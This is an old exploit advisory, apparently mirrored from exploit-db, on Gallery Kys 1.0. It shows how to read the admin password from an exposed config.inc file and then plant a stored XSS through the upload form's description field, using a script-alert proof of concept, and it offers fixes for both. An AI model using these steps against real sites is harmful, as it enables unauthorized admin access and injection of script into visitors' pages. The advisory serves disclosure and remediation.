Gallery Kys 1.0 - Admin Password Disclosure / Persistent Cross-Site Scripting

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057337 漏洞类型
发布时间 2009-01-19 更新时间 2009-01-19
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/7829
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
[START]

#########################################################################################
[0x01] Informations:

Script         : Gallery Kys 1.0
Download       : http://www.advancescripts.com/djump.php?ID=6285
Vulnerability  : Admin Password Disclosure / Permanent XSS
Author         : Osirys
Contact        : osirys[at]live[dot]it
Website        : http://osirys.org

#########################################################################################
[0x02] Bug: [Admin Password Disclosure]
######

Bugged file is: /[path]/config.inc

[CODE]

<?
$adpass="admin"; //change admin to your password of choice
?>

[/CODE]

Just going at this path you will get Administrator's password.

[!] FIX: Don't allow direct access to this file and change it's extension with .php


[!] EXPLOIT: /[path]/config.inc
             $adpass="admin_pwd";

#########################################################################################
[0x03] Bug: [Permanent XSS]
######

Bugged file is: /[path]/uploadform.php

[CODE]

$fp =fopen($file, "w+");
$name=stripslashes($name);
$des=stripslashes($des);
$code=stripslashes($code);
$author=stripslashes($author);
$w ="name=".$name."&price=".$price."&code=".$code."&des=".$des."&author=".$author."&mail=".$mail."&date=".$date."&web=".$web;

[/CODE]

Once we got Administrator's password, we are able to log in.

Login at this path: /[path]/admin.php

Then just go at this path: /[path]/uploadform.php

Fill the forms, and put in description form the following code:

<script>alert("XSS")</script>

After this action, data that we typed in the upload form, will be saved on .txt files.
In index.php source code, we can see that the script opens the .txt files, and prints
it's values directly in html code. 


[!] FIX: Filter variables before printing them in the html code.
         preg_math the < > " chars. Filter illegal chars.

#########################################################################################

[/END]

# milw0rm.com [2009-01-19]